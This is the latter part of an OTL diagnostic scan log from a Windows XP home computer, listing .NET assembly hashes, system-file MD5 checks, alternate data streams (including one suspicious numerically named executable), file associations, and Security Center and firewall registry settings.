[2011/06/13 16:13:12 | 000,229,376 | ---- | M] () MD5=3FE6C3CDB01F039110152B1B0AE4980F -- C:\WINDOWS\assembly\GAC_MSIL\System.Data.Entity.Design\3.5.0.0__b77a5c561934e089\System.Data.Entity.Design.dll
[2011/06/13 16:13:13 | 002,879,488 | ---- | M] () MD5=CB45DFC6F9E1F954A718769D02D9C312 -- C:\WINDOWS\assembly\GAC_MSIL\System.Data.Entity\3.5.0.0__b77a5c561934e089\System.Data.Entity.dll
[2011/06/13 16:13:07 | 000,684,032 | ---- | M] () MD5=DDFB10C4A14ADD5D0A6C96E6DC3D29DF -- C:\WINDOWS\assembly\GAC_MSIL\System.Data.Linq\3.5.0.0__b77a5c561934e089\System.Data.Linq.dll
[2011/06/13 16:13:06 | 000,294,912 | ---- | M] () MD5=31D8266EF0201DEDDFF189A75A5D475A -- C:\WINDOWS\assembly\GAC_MSIL\System.Data.Services.Client\3.5.0.0__b77a5c561934e089\System.Data.Services.Client.dll
[2011/06/13 16:13:06 | 000,114,688 | ---- | M] () MD5=0A7F3B1C1A9CC722F48A7A16394F61C4 -- C:\WINDOWS\assembly\GAC_MSIL\System.Data.Services.Design\3.5.0.0__b77a5c561934e089\System.Data.Services.Design.dll
[2011/06/13 16:13:06 | 000,442,368 | ---- | M] () MD5=82F8B1D055AFF7DAF984290AEB453646 -- C:\WINDOWS\assembly\GAC_MSIL\System.Data.Services\3.5.0.0__b77a5c561934e089\System.Data.Services.dll
[2011/06/13 16:10:10 | 000,745,472 | ---- | M] () MD5=6388F9A7AA6E22DDA2E0D84E5BCE537C -- C:\WINDOWS\assembly\GAC_MSIL\System.Data.SqlXml\2.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll
[2011/06/13 16:10:08 | 000,970,752 | ---- | M] () MD5=97DDAFB2A7B33DC3F746EF35C9EDF892 -- C:\WINDOWS\assembly\GAC_MSIL\System.Deployment\2.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
[2011/06/13 16:10:00 | 005,062,656 | ---- | M] () MD5=5C368BEBD58562133856B35BDCEFEADA -- C:\WINDOWS\assembly\GAC_MSIL\System.Design\2.0.0.0__b03f5f7f11d50a3a\System.Design.dll
[2011/06/13 16:13:06 | 000,286,720 | ---- | M] () MD5=4C6FBCBB7E7D4E3B0CAAA42043B6A01F -- C:\WINDOWS\assembly\GAC_MSIL\System.DirectoryServices.AccountManagement\3.5.0.0__b77a5c561934e089\System.DirectoryServices.AccountManagement.dll
[2011/06/13 16:10:06 | 000,188,416 | ---- | M] () MD5=F0D4CE77F1F9D9A7468335B1CE4C061B -- C:\WINDOWS\assembly\GAC_MSIL\System.DirectoryServices.Protocols\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.Protocols.dll
[2011/06/13 16:10:07 | 000,401,408 | ---- | M] () MD5=F485CF34C45F850B25A7E38B08A7C435 -- C:\WINDOWS\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll
[2011/06/13 16:10:00 | 000,081,920 | ---- | M] () MD5=36ABC218228871A981027174216A2DA8 -- C:\WINDOWS\assembly\GAC_MSIL\System.Drawing.Design\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.Design.dll
[2011/06/13 16:10:15 | 000,626,688 | ---- | M] () MD5=179CC375C81B39902825ABFE3A7CD49D -- C:\WINDOWS\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
[2011/06/13 16:12:22 | 000,126,976 | ---- | M] () MD5=311A345681A73C66D3EE49C5157A473B -- C:\WINDOWS\assembly\GAC_MSIL\System.IdentityModel.Selectors\3.0.0.0__b77a5c561934e089\System.IdentityModel.Selectors.dll
[2011/06/13 16:12:08 | 000,430,080 | ---- | M] () MD5=3A107FEC33CD77CB0CD80D2EBD8052F0 -- C:\WINDOWS\assembly\GAC_MSIL\System.IdentityModel\3.0.0.0__b77a5c561934e089\System.IdentityModel.dll
[2011/06/13 16:12:08 | 000,131,072 | ---- | M] () MD5=80E67BFFD101CC6312B489BEE255430D -- C:\WINDOWS\assembly\GAC_MSIL\System.IO.Log\3.0.0.0__b03f5f7f11d50a3a\System.IO.Log.dll
[2011/06/13 16:13:14 | 000,143,360 | ---- | M] () MD5=217A1E1DED132261C825313A7FB2616C -- C:\WINDOWS\assembly\GAC_MSIL\System.Management.Instrumentation\3.5.0.0__b77a5c561934e089\System.Management.Instrumentation.dll
[2011/06/13 16:10:11 | 000,372,736 | ---- | M] () MD5=EBAADBBFB6C455E54EB6A0E47267D33C -- C:\WINDOWS\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll
[2011/06/13 16:10:09 | 000,258,048 | ---- | M] () MD5=7F9F1F17D368EE1EEA7E246FD934B9EC -- C:\WINDOWS\assembly\GAC_MSIL\System.Messaging\2.0.0.0__b03f5f7f11d50a3a\System.Messaging.dll
[2011/06/13 16:13:17 | 000,233,472 | ---- | M] () MD5=2E66DE31546A6AB3A8160CE337E1C6BC -- C:\WINDOWS\assembly\GAC_MSIL\System.Net\3.5.0.0__b03f5f7f11d50a3a\System.Net.dll
[2011/06/13 16:10:09 | 000,303,104 | ---- | M] () MD5=2849F13593D2712CCB97FFBDD3C1232E -- C:\WINDOWS\assembly\GAC_MSIL\System.Runtime.Remoting\2.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
[2011/06/13 16:10:08 | 000,131,072 | ---- | M] () MD5=C415D86079D431E7E1E32D0835A3FE81 -- C:\WINDOWS\assembly\GAC_MSIL\System.Runtime.Serialization.Formatters.Soap\2.0.0.0__b03f5f7f11d50a3a\System.Runtime.Serialization.Formatters.Soap.dll
[2011/06/13 16:12:08 | 000,966,656 | ---- | M] () MD5=FEF363534B2E325A1AE11DE7B12441E3 -- C:\WINDOWS\assembly\GAC_MSIL\System.Runtime.Serialization\3.0.0.0__b77a5c561934e089\System.Runtime.Serialization.dll
[2011/06/13 16:10:16 | 000,258,048 | ---- | M] () MD5=EC02948F86ACA3C0967F44BA2C6E11C4 -- C:\WINDOWS\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll
[2011/06/13 16:12:11 | 000,073,728 | ---- | M] () MD5=A80F41C8B2168E8B3ADD0AA4FCBDDC93 -- C:\WINDOWS\assembly\GAC_MSIL\System.ServiceModel.Install\3.0.0.0__b77a5c561934e089\System.ServiceModel.Install.dll
[2011/06/13 16:12:12 | 000,032,768 | ---- | M] () MD5=43920F2E0EF924094796AFF2CE6279AD -- C:\WINDOWS\assembly\GAC_MSIL\System.ServiceModel.WasHosting\3.0.0.0__b77a5c561934e089\System.ServiceModel.WasHosting.dll
[2011/06/13 16:13:06 | 000,569,344 | ---- | M] () MD5=1565B7FAFDFA6EEE16101388E57E749F -- C:\WINDOWS\assembly\GAC_MSIL\System.ServiceModel.Web\3.5.0.0__31bf3856ad364e35\System.ServiceModel.Web.dll
[2011/06/13 16:12:09 | 005,931,008 | ---- | M] () MD5=3E284E5922C7D3D63D8B985526AE39EE -- C:\WINDOWS\assembly\GAC_MSIL\System.ServiceModel\3.0.0.0__b77a5c561934e089\System.ServiceModel.dll
[2011/06/13 16:10:15 | 000,114,688 | ---- | M] () MD5=50D2943D426BA91771AD87FDEC802AC3 -- C:\WINDOWS\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll
[2011/06/13 16:12:18 | 000,688,128 | ---- | M] () MD5=31588B867657A7DF046AC1908550D73C -- C:\WINDOWS\assembly\GAC_MSIL\System.Speech\3.0.0.0__31bf3856ad364e35\System.Speech.dll
[2011/06/13 16:13:18 | 000,077,824 | ---- | M] () MD5=2C3559C513F7CD6F95DC382F31A6A22D -- C:\WINDOWS\assembly\GAC_MSIL\System.Web.Abstractions\3.5.0.0__31bf3856ad364e35\System.Web.Abstractions.dll
[2011/06/13 16:13:18 | 000,032,768 | ---- | M] () MD5=9E0D101B086297D5E166E03A8ACBF260 -- C:\WINDOWS\assembly\GAC_MSIL\System.Web.DynamicData.Design\3.5.0.0__31bf3856ad364e35\System.Web.DynamicData.Design.dll
[2011/06/13 16:13:19 | 000,225,280 | ---- | M] () MD5=E4613934FBC2471C01D9C9DADE7DD4D9 -- C:\WINDOWS\assembly\GAC_MSIL\System.Web.DynamicData\3.5.0.0__31bf3856ad364e35\System.Web.DynamicData.dll
[2011/06/13 16:13:14 | 000,131,072 | ---- | M] () MD5=A6A5297AAD0A9BA8829D20B1CBD68D32 -- C:\WINDOWS\assembly\GAC_MSIL\System.Web.Entity.Design\3.5.0.0__b77a5c561934e089\System.Web.Entity.Design.dll
[2011/06/13 16:13:15 | 000,139,264 | ---- | M] () MD5=1485861B7989FBA40B9387B748914335 -- C:\WINDOWS\assembly\GAC_MSIL\System.Web.Entity\3.5.0.0__b77a5c561934e089\System.Web.Entity.dll
[2011/06/13 16:13:20 | 000,335,872 | ---- | M] () MD5=7E83B8040233DDCDE03CF7F0A5F2837B -- C:\WINDOWS\assembly\GAC_MSIL\System.Web.Extensions.Design\3.5.0.0__31bf3856ad364e35\System.Web.Extensions.Design.dll
[2011/06/13 16:13:21 | 001,277,952 | ---- | M] () MD5=11564BD3D6D705F47525C128480064F7 -- C:\WINDOWS\assembly\GAC_MSIL\System.Web.Extensions\3.5.0.0__31bf3856ad364e35\System.Web.Extensions.dll
[2011/06/13 16:09:58 | 000,835,584 | ---- | M] () MD5=C22D59F4EAC00510D1A86061A428C633 -- C:\WINDOWS\assembly\GAC_MSIL\System.Web.Mobile\2.0.0.0__b03f5f7f11d50a3a\System.Web.Mobile.dll
[2011/06/13 16:09:56 | 000,077,824 | ---- | M] () MD5=F27A80887F125661CAC1A6039107428F -- C:\WINDOWS\assembly\GAC_MSIL\System.Web.RegularExpressions\2.0.0.0__b03f5f7f11d50a3a\System.Web.RegularExpressions.dll
[2011/06/13 16:13:22 | 000,061,440 | ---- | M] () MD5=5B7868DF14D71D328EE8C1213F852393 -- C:\WINDOWS\assembly\GAC_MSIL\System.Web.Routing\3.5.0.0__31bf3856ad364e35\System.Web.Routing.dll
[2011/06/13 16:09:57 | 000,839,680 | ---- | M] () MD5=A89DFA6DB0C3D00559F770A214962A60 -- C:\WINDOWS\assembly\GAC_MSIL\System.Web.Services\2.0.0.0__b03f5f7f11d50a3a\System.Web.Services.dll
[2011/06/13 16:09:59 | 005,025,792 | ---- | M] () MD5=4BBB50EE0660AD59380E27EA00F318C9 -- C:\WINDOWS\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
[2011/06/13 16:13:15 | 000,012,288 | ---- | M] () MD5=044C3400A836E5FB60D4A49EAEC24544 -- C:\WINDOWS\assembly\GAC_MSIL\System.Windows.Presentation\3.5.0.0__b77a5c561934e089\System.Windows.Presentation.dll
[2011/06/13 16:12:16 | 001,138,688 | ---- | M] () MD5=A96933F3898290AA509080A90E0C7C5F -- C:\WINDOWS\assembly\GAC_MSIL\System.Workflow.Activities\3.0.0.0__31bf3856ad364e35\System.Workflow.Activities.dll
[2011/06/13 16:12:16 | 001,630,208 | ---- | M] () MD5=C4503F6EADC2638D6898514290A7A60B -- C:\WINDOWS\assembly\GAC_MSIL\System.Workflow.ComponentModel\3.0.0.0__31bf3856ad364e35\System.Workflow.ComponentModel.dll
[2011/06/13 16:12:16 | 000,540,672 | ---- | M] () MD5=6623152B2FB7DC650C6A8FE01AF71F44 -- C:\WINDOWS\assembly\GAC_MSIL\System.Workflow.Runtime\3.0.0.0__31bf3856ad364e35\System.Workflow.Runtime.dll
[2011/06/13 16:13:06 | 000,507,904 | ---- | M] () MD5=E249D1B3114088C0D390A60643BF2BBC -- C:\WINDOWS\assembly\GAC_MSIL\System.WorkflowServices\3.5.0.0__31bf3856ad364e35\System.WorkflowServices.dll
[2011/06/13 16:13:16 | 000,139,264 | ---- | M] () MD5=64925CC79EA9E8245A4F18703CCABEC4 -- C:\WINDOWS\assembly\GAC_MSIL\System.Xml.Linq\3.5.0.0__b77a5c561934e089\System.Xml.Linq.dll
[2011/06/13 16:10:15 | 002,048,000 | ---- | M] () MD5=FCA78DCEFF0809B060B01710D07CC16E -- C:\WINDOWS\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll
[2011/06/13 16:10:06 | 003,149,824 | ---- | M] () MD5=86601F6A08C75A16D4D0509CB31EE318 -- C:\WINDOWS\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll
[2011/06/13 16:12:18 | 000,167,936 | ---- | M] () MD5=F303A07A6EF37B8B6DD928D97A016B75 -- C:\WINDOWS\assembly\GAC_MSIL\UIAutomationClient\3.0.0.0__31bf3856ad364e35\UIAutomationClient.dll
[2011/06/13 16:12:19 | 000,385,024 | ---- | M] () MD5=09658EF5F16F2ABD74FE577D50C0D155 -- C:\WINDOWS\assembly\GAC_MSIL\UIAutomationClientsideProviders\3.0.0.0__31bf3856ad364e35\UIAutomationClientsideProviders.dll
[2011/06/13 16:12:14 | 000,040,960 | ---- | M] () MD5=A93561FB224FA8539357C74065403630 -- C:\WINDOWS\assembly\GAC_MSIL\UIAutomationProvider\3.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll
[2011/06/13 16:12:14 | 000,098,304 | ---- | M] () MD5=5BE33FC308914C1AE6577A908D97A4FF -- C:\WINDOWS\assembly\GAC_MSIL\UIAutomationTypes\3.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll
[2011/06/13 16:12:15 | 001,245,184 | ---- | M] () MD5=64B09796E91430982C3C2A2B17BC2FA1 -- C:\WINDOWS\assembly\GAC_MSIL\WindowsBase\3.0.0.0__31bf3856ad364e35\WindowsBase.dll
[2011/06/13 16:12:19 | 000,094,208 | ---- | M] () MD5=E205A79EA6C06F91EA08BBE59FE83503 -- C:\WINDOWS\assembly\GAC_MSIL\WindowsFormsIntegration\3.0.0.0__31bf3856ad364e35\WindowsFormsIntegration.dll

< MD5 for: EXPLORER.EXE >
[2008/04/14 08:00:00 | 001,033,728 | ---- | M] (Microsoft Corporation) MD5=12896823FB95BFB3DC9B46BCAEDC9923 -- C:\WINDOWS\ERDNT\cache\explorer.exe
[2008/04/14 08:00:00 | 001,033,728 | ---- | M] (Microsoft Corporation) MD5=12896823FB95BFB3DC9B46BCAEDC9923 -- C:\WINDOWS\explorer.exe
[2008/04/14 08:00:00 | 001,033,728 | ---- | M] (Microsoft Corporation) MD5=12896823FB95BFB3DC9B46BCAEDC9923 -- C:\WINDOWS\system32\dllcache\explorer.exe

< MD5 for: IPSEC.SYS >
[2008/04/14 08:00:00 | 000,075,264 | ---- | M] (Microsoft Corporation) MD5=23C74D75E36E7158768DD63D92789A91 -- C:\WINDOWS\ERDNT\cache\ipsec.sys
[2008/04/14 08:00:00 | 000,075,264 | ---- | M] (Microsoft Corporation) MD5=23C74D75E36E7158768DD63D92789A91 -- C:\WINDOWS\system32\dllcache\ipsec.sys
[2008/04/14 08:00:00 | 000,075,264 | ---- | M] (Microsoft Corporation) MD5=23C74D75E36E7158768DD63D92789A91 -- C:\WINDOWS\system32\drivers\ipsec.sys

< MD5 for: LSASS.EXE >
[2008/04/14 08:00:00 | 000,013,312 | ---- | M] (Microsoft Corporation) MD5=BF2466B3E18E970D8A976FB95FC1CA85 -- C:\WINDOWS\ERDNT\cache\lsass.exe
[2008/04/14 08:00:00 | 000,013,312 | ---- | M] (Microsoft Corporation) MD5=BF2466B3E18E970D8A976FB95FC1CA85 -- C:\WINDOWS\system32\dllcache\lsass.exe
[2008/04/14 08:00:00 | 000,013,312 | ---- | M] (Microsoft Corporation) MD5=BF2466B3E18E970D8A976FB95FC1CA85 -- C:\WINDOWS\system32\lsass.exe

< MD5 for: NETBT.SYS >
[2008/04/14 08:00:00 | 000,162,816 | ---- | M] (Microsoft Corporation) MD5=74B2B2F5BEA5E9A3DC021D685551BD3D -- C:\WINDOWS\system32\dllcache\netbt.sys
[2008/04/14 08:00:00 | 000,162,816 | ---- | M] (Microsoft Corporation) MD5=74B2B2F5BEA5E9A3DC021D685551BD3D -- C:\WINDOWS\system32\drivers\netbt.sys

< MD5 for: SERVICES.EXE >
[2009/02/06 07:06:24 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=020CEAAEDC8EB655B6506B8C70D53BB6 -- C:\WINDOWS\$hf_mig$\KB956572\SP3QFE\services.exe
[2008/04/14 08:00:00 | 000,108,544 | ---- | M] (Microsoft Corporation) MD5=0E776ED5F7CC9F94299E70461B7B8185 -- C:\WINDOWS\$NtUninstallKB956572$\services.exe
[2009/02/06 07:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\WINDOWS\ERDNT\cache\services.exe
[2009/02/06 07:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\WINDOWS\system32\dllcache\services.exe
[2009/02/06 07:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\WINDOWS\system32\services.exe

< MD5 for: SMSS.EXE >
[2008/04/14 08:00:00 | 000,470,016 | ---- | M] (Microsoft Corporation) MD5=3C3393C92A73A3006C7B706DAC54A812 -- C:\i386\SYSTEM32\SMSS.EXE
[2008/04/14 08:00:00 | 000,050,688 | ---- | M] (Microsoft Corporation) MD5=5F816C1F539266D2D4C78694239DA0B5 -- C:\WINDOWS\system32\dllcache\smss.exe
[2008/04/14 08:00:00 | 000,050,688 | ---- | M] (Microsoft Corporation) MD5=5F816C1F539266D2D4C78694239DA0B5 -- C:\WINDOWS\system32\smss.exe
[2004/08/04 00:56:58 | 000,152,576 | ---- | M] (Microsoft Corporation) MD5=DA5CF1C368B33D75602FD6B3A7F5E0C6 -- C:\cmdcons\SYSTEM32\SMSS.EXE

< MD5 for: SVCHOST.EXE >
[2008/04/14 08:00:00 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=27C6D03BCDB8CFEB96B716F3D8BE3E18 -- C:\WINDOWS\ERDNT\cache\svchost.exe
[2008/04/14 08:00:00 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=27C6D03BCDB8CFEB96B716F3D8BE3E18 -- C:\WINDOWS\system32\dllcache\svchost.exe
[2008/04/14 08:00:00 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=27C6D03BCDB8CFEB96B716F3D8BE3E18 -- C:\WINDOWS\system32\svchost.exe
[2011/12/24 18:50:20 | 000,182,856 | ---- | M] () MD5=B382935AB01B27D0E14F267DBF288896 -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\svchost.exe

< MD5 for: WINLOGON.EXE >
[2011/12/24 18:50:20 | 000,182,856 | ---- | M] () MD5=B382935AB01B27D0E14F267DBF288896 -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\winlogon.exe
[2008/04/14 08:00:00 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\WINDOWS\ERDNT\cache\winlogon.exe
[2008/04/14 08:00:00 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\WINDOWS\system32\dllcache\winlogon.exe
[2008/04/14 08:00:00 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\WINDOWS\system32\winlogon.exe

========== Hard Links - Junction Points - Mount Points - Symbolic Links ==========
[C:\WINDOWS\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a] -> C:\WINDOWS\WinSxS\x86_System.EnterpriseServices_b03f5f7f11d50a3a_2.0.0.0_x-ww_7d5f3790 -> Junction
[C:\WINDOWS\assembly\GAC_MSIL\IEExecRemote\2.0.0.0__b03f5f7f11d50a3a] -> C:\WINDOWS\WinSxS\MSIL_IEExecRemote_b03f5f7f11d50a3a_2.0.0.0_x-ww_6e57c34e -> Junction

========== Alternate Data Streams ==========

@Alternate Data Stream - 816 bytes -> C:\WINDOWS\3628639882:1968813863.exe
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\TR CA 4521 Bessen 2009.doc:com.dropbox.attributes
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\TR CA 1188 Co 2003.doc:com.dropbox.attributes
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Thom.xls:com.dropbox.attributes
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Kappa.xls:com.dropbox.attributes
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Kappa (Thom Ringer's conflicted copy 2012-02-08).xls:com.dropbox.attributes
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Data Abstraction Thom.xls:com.dropbox.attributes
@Alternate Data Stream - 65 bytes -> C:\Documents and Settings\Annie\Desktop\Critical Appraisal Tracking SS.xlsx:com.dropbox.attributes
@Alternate Data Stream - 58 bytes -> C:\Documents and Settings\Annie\Desktop\Quality Assessment Tool_2010_2.pdf:com.dropbox.attributes
@Alternate Data Stream - 153 bytes -> C:\Documents and Settings\Annie\Desktop\TR CA 1171 Banait 2002.doc:com.dropbox.attributes
@Alternate Data Stream - 153 bytes -> C:\Documents and Settings\Annie\Desktop\Critical Appraisal Template.dot:com.dropbox.attributes

< End of report >

Extras:
OTL Extras logfile created on: 13/05/2012 12:06:57 PM - Run 1
OTL by OldTimer - Version 3.2.42.3 Folder = C:\Documents and Settings\Annie\My Documents\Downloads
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 6.0.2900.5512)
Locale: 00001009 | Country: Canada | Language: ENC | Date Format: dd/MM/yyyy

1013.99 Mb Total Physical Memory | 587.01 Mb Available Physical Memory | 57.89% Memory free
2.38 Gb Paging File | 2.07 Gb Available in Paging File | 86.93% Paging File free
Paging file location(s): C:\pagefile.sys 1524 3048 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 139.04 Gb Total Space | 15.29 Gb Free Space | 11.00% Space Free | Partition Type: NTFS

Computer Name: FELIX | User Name: Annie | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 90 Days

========== Extra Registry (SafeList) ==========


========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.url [@ = InternetShortcut] -- rundll32.exe shdocvw.dll,OpenURL %l

[HKEY_USERS\S-1-5-21-1313911845-3924064129-568730901-1006\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)

========== Shell Spawning ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
InternetShortcut [open] -- rundll32.exe shdocvw.dll,OpenURL %l
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" %*
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled" = 1
"AntiVirusDisableNotify" = 0
"FirewallDisableNotify" = 0
"UpdatesDisableNotify" = 0
"AntiVirusOverride" = 0
"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

========== System Restore Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sr]
"Start" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SrService]
"Start" = 2

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 0
"DoNotAllowExceptions" = 0
"DisableNotifications" = 1

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"139:TCP" = 139:TCP:*:Enabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:*:Enabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:*:Enabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:*:Enabled:@xpsp2res.dll,-22002
"1900:UDP" = 1900:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22007
"2869:TCP" = 2869:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22008

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DoNotAllowExceptions" = 0
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"1900:UDP" = 1900:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22007
"2869:TCP" = 2869:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22008
"139:TCP" = 139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22002

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\Samsung\AllShare\AllShareDMS\AllShareDMS.exe" = C:\Program Files\Samsung\AllShare\AllShareDMS\AllShareDMS.exe:*:Enabled:Samsung AllShare Service -- (Samsung Electronics Co., Ltd.)
"C:\Program Files\Samsung\AllShare\AllShare.exe" = C:\Program Files\Samsung\AllShare\AllShare.exe:*:Enabled:Samsung AllShare Player -- (Samsung Electronics Co., Ltd.)
"C:\Program Files\Samsung\AllShare\AllShareAgent.exe" = C:\Program Files\Samsung\AllShare\AllShareAgent.exe:*:Enabled:Samsung AllShare Agent -- (Samsung Electronics Co., Ltd.)


========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP280_series" = Canon MP280 series MP Drivers
